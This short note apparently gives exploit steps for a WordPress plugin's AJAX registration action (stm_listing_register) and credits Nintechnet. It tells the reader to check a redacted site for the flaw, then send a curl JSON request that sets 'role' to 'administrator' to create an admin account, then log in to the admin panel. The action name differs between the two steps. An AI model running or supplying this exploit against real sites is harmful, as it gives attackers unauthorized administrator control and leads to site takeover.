Reference : Nintechnet
- Check if redacted vuln by accessing
http://redacted.com/wp-admin/admin-ajax.php?action=stm_listing_register
Note: Not all vuln.
- Make Json request to redacted
curl "https://redacted.com/wp-admin/admin-ajax.php?action=s_listing_register" -d '{"email": "Your Email","first_name":"Rinto","last_name": "ARRRR", "login": "YOUR USERNAME", "password": "YOUR PASSWORD", "password_repeat":"YOUR PASSWORD","role":"administrator"}' -v
- Login to admin panel.